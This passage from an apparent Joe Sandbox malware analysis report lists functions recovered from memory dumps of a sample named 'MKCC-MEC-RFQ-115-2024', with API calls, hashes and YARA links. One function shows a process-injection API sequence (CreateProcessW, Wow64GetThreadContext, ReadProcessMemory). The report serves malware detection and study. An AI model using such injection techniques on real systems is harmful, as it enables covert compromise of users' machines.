                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
                                              • Opcode ID: 266b1c8ae036091b818e15ff62152c3028407632420faa770c83a8ae7448c449
                                              • Instruction ID: 7ecf80831505e85e1f770929d963a0e84d8d423ee546febb3ba92fb0a382b69c
                                              • Opcode Fuzzy Hash: 266b1c8ae036091b818e15ff62152c3028407632420faa770c83a8ae7448c449
                                              • Instruction Fuzzy Hash: 8CF0F435504309B6CB21BA98ED019DF7BADDF10360F204425F8C8A22D1DFF18A8186E0
                                              Function 0010582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: 7b6b41c277f668def0dc0bcfa2a23dd2443eb499c6b182cc5dd6d64d23197ee0
                                              • Instruction ID: 68b2f9af8627262a10c0fe3151adb499f84a762e697d5d0001b66b4956542366
                                              • Opcode Fuzzy Hash: 7b6b41c277f668def0dc0bcfa2a23dd2443eb499c6b182cc5dd6d64d23197ee0
                                              • Instruction Fuzzy Hash: 92014871801609EBCF11AF6A8C0559F7B62BF54360F148216BC945A1E1DBB1CA21DF91
                                              Function 001055D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              • __lock_file.LIBCMT ref: 0010561B
                                                • Part of subcall function 00106E4E: __lock.LIBCMT ref: 00106E71
                                              • __fclose_nolock.LIBCMT ref: 00105626
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 70fe2eb516d7648ae83d495edbb3d70b03e6c3c9ea6283ee3a17462f0c491882
                                              • Instruction ID: 620dd565308f20ef4c93001f87d49af736e4567f9c0544b6f4b0041e63496a80
                                              • Opcode Fuzzy Hash: 70fe2eb516d7648ae83d495edbb3d70b03e6c3c9ea6283ee3a17462f0c491882
                                              • Instruction Fuzzy Hash: 15F0B471805B059ADB20BF79C80276F77A26F60334F558209B4D5AB1C1CFFC89019F55
                                              Function 00EF129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF1A5B
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF1AF1
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF1B13
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                              • Instruction ID: bcd1b55f903751b5c37fdaa530359fac6cf443589aff11d14f1abcf76c7b46e1
                                              • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                              • Instruction Fuzzy Hash: 6F12CE24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A
                                              Function 000F2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0af129aeb16b2ce6cbb1180717da98e76e0afd7ed96cfb8c340c2f1a5688d7d7
                                              • Instruction ID: 6dc478a6d9a6ccbcc32ffc2f6827707ece0bc9af7b7ff750cbd2ea13ef0897db
                                              • Opcode Fuzzy Hash: 0af129aeb16b2ce6cbb1180717da98e76e0afd7ed96cfb8c340c2f1a5688d7d7
                                              • Instruction Fuzzy Hash: 46517A35600614AFCF14EB68CD91EBE77A6AF85314F1484A8F946AB293CB34ED00DB55
                                              Function 000E5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 000E5CF6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: d5f805b6f6153fa295bf90928c6c41b68fb71317e2cc4414d850ad0e5f53b6a2
                                              • Instruction ID: 378670d6f286d2d32e42ac035b1eb95ed269bdf9555686a08619281de32deab6
                                              • Opcode Fuzzy Hash: d5f805b6f6153fa295bf90928c6c41b68fb71317e2cc4414d850ad0e5f53b6a2
                                              • Instruction Fuzzy Hash: 84317031A00B49AFCB18DF6EC8946ADB7B5FF48315F248A29D819A3710D771BD90DB90
                                              Function 001200D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 1afb8f976a681e4978e9fbd2dd3229803343824ed42113c3ea4f640466b98843
                                              • Instruction ID: 547fcc44e742aea06f35385ab8af9b0773cc266cf371afc5dfe46ea3a08d76c7
                                              • Opcode Fuzzy Hash: 1afb8f976a681e4978e9fbd2dd3229803343824ed42113c3ea4f640466b98843
                                              • Instruction Fuzzy Hash: 89415974608390CFDB24CF14C484B1ABBE0BF49314F1989ACE8895B762C335EC95CB42
                                              Function 000E5B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 5ad07f881251800a9ba56987d779fece19744a6f181f3a9ab101a5441c1c8796
                                              • Instruction ID: c0c001037a0c84bc44df87479b3995a21b6835e6230b0c5746a8f85006d7613b
                                              • Opcode Fuzzy Hash: 5ad07f881251800a9ba56987d779fece19744a6f181f3a9ab101a5441c1c8796
                                              • Instruction Fuzzy Hash: C721D231A04A08EBDB185F91EC856AE7FF8FF14390F21887AF885D2410EBB094E0D755
                                              Function 000E4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E4D13: FreeLibrary.KERNEL32(00000000,?), ref: 000E4D4D
                                                • Part of subcall function 0010548B: __wfsopen.LIBCMT ref: 00105496
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4F6F
                                                • Part of subcall function 000E4CC8: FreeLibrary.KERNEL32(00000000), ref: 000E4D02
                                                • Part of subcall function 000E4DD0: _memmove.LIBCMT ref: 000E4E1A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: 094ee7bc5da93dca321c92f33ae1e1b74afb94286805bb02330cde9275234e9d
                                              • Instruction ID: 875d18ee617678f278864451a383fb0e20a89fd2acebad8719941a93e75cd5a0
                                              • Opcode Fuzzy Hash: 094ee7bc5da93dca321c92f33ae1e1b74afb94286805bb02330cde9275234e9d
                                              • Instruction Fuzzy Hash: 7411E731A00209AECF14AF71DC52BEE77A59F40B11F20883DF545B71C2DB719A159B50
                                              Function 001201AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: faaa9a0de4887dc4e2540e0c5c319442552355f5a8de940854780935368be2d5
                                              • Instruction ID: ba5efdd07d1b10edf77a81584a2d1cd285066c40f2c59d8d6d48f1dbfb0fee4e
                                              • Opcode Fuzzy Hash: faaa9a0de4887dc4e2540e0c5c319442552355f5a8de940854780935368be2d5
                                              • Instruction Fuzzy Hash: 2D2130B4608391DFCB24DF24C884A1ABBE0BF89304F05896CF89A67762C731F855CB52
                                              Function 00100941 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001009F4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID:
                                              • API String ID: 82841172-0
                                              • Opcode ID: 48c96470f25bc4dcb42ae76480deda8cab9f13fffe71f0f4789fc48a6e954c0f
                                              • Instruction ID: 7d1f62aadc9785fc55d1d6686c63da7358fea5f8cb82031c3f7cc506e53c821c
                                              • Opcode Fuzzy Hash: 48c96470f25bc4dcb42ae76480deda8cab9f13fffe71f0f4789fc48a6e954c0f
                                              • Instruction Fuzzy Hash: 8E111B3600F2C08FCB13C768DCD5A917FB6AE4B22430E41DAD4859F927D9A4981ADB62
                                              Function 000E5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000E5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 000E5D76
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 795a1b77ee6b6f96c06c6448b15014c67d19bd5b52d48211f6377344ffe64cd1
                                              • Instruction ID: dc10af9bdde309359314e5bb2b021b422f757f65ac2596b8b2e8f999704f92dc
                                              • Opcode Fuzzy Hash: 795a1b77ee6b6f96c06c6448b15014c67d19bd5b52d48211f6377344ffe64cd1
                                              • Instruction Fuzzy Hash: 57113631208B419FD3708F16CC88B66B7E9EF45769F10C92EE4AA96A50D7B0E945CB60
                                              Function 000E5BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                              • Instruction ID: c4f4394a219e7bad37c47b8134d40d60ca82e541e8d67614747cd17e08e549ff
                                              • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                              • Instruction Fuzzy Hash: A001A2B9700982AFC305DB69C851D6AFBA9FF9A3147148569F859C7702DB70EC21CBE0
                                              Function 00104A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              • __lock_file.LIBCMT ref: 00104AD6
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2597487223-0
                                              • Opcode ID: 6122f6293c701f6a1184750cbc78fb4ad4db53b5386d41864788eef7a8dd642f
                                              • Instruction ID: 331155f6f97c2e30aa31e1dae07ccbab898fd15fe4906e1dd3663f02194b1e29
                                              • Opcode Fuzzy Hash: 6122f6293c701f6a1184750cbc78fb4ad4db53b5386d41864788eef7a8dd642f
                                              • Instruction Fuzzy Hash: E7F0AFB1A40209EBDF61BFB4CC4639E36A1AF20325F048524B5A5AB1D1CBF88A60DF55
                                              Function 000E4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4FDE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 007924c6f68d3a6ba6fa5ab1575f2ae02ea00e3e8c1f258f9d21c804cb64c46f
                                              • Instruction ID: d75b06e766fece35ff50c8da2f6a0c7461002b933c36e9de3ede52379b6e9c64
                                              • Opcode Fuzzy Hash: 007924c6f68d3a6ba6fa5ab1575f2ae02ea00e3e8c1f258f9d21c804cb64c46f
                                              • Instruction Fuzzy Hash: D7F03971505752CFCB349F66E894816FBE1BF147293208A3EE1D692A10C771A880DF50
                                              Function 001009D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001009F4
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: 6c3686e3fc99c2b201e203bee7547b12be8f7ca379c658d33221c385525ccf83
                                              • Instruction ID: c107956fabda3d4fd62ad6fc31f2d97ab93f2d13e1857849b7c1e9106381d64a
                                              • Opcode Fuzzy Hash: 6c3686e3fc99c2b201e203bee7547b12be8f7ca379c658d33221c385525ccf83
                                              • Instruction Fuzzy Hash: 6EE0CD7690422C5BC720D6589C05FFAB7FDDF88790F0401B5FD0CD7215E9A09CC18690
                                              Function 00149129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                              • Instruction ID: fa01801f8994e8f3ee4174d1d6ae8ff656665f93ab45624ae716efe627fa35ad
                                              • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                              • Instruction Fuzzy Hash: 0DE092B0104B005FD7348A24D8107E373E1AB16325F00081DF6DA83341EB6278418B59
                                              Function 000E5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0011E16B,?,?,00000000), ref: 000E5DBF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: dabc6d6d2f661b8c15c1b76b184b95cacf9e1a9ce366fe7f498765502d61dd0f
                                              • Instruction ID: 153da9ceede05d3f0a449cdcf3d235b239cc686d62266088fc76a2e17e30c565
                                              • Opcode Fuzzy Hash: dabc6d6d2f661b8c15c1b76b184b95cacf9e1a9ce366fe7f498765502d61dd0f
                                              • Instruction Fuzzy Hash: 56D0C77564420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6F27D508795
                                              Function 0010548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: 59d609c8d034505adcd8e9b96316b398c3826094ff34e054479004b884af7223
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: 71B09B7544010C77DF011D41EC02A553B195750674F404010FB0C18161A67395605585
                                              Function 0014D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 0014D46A
                                              Memory Dump Source
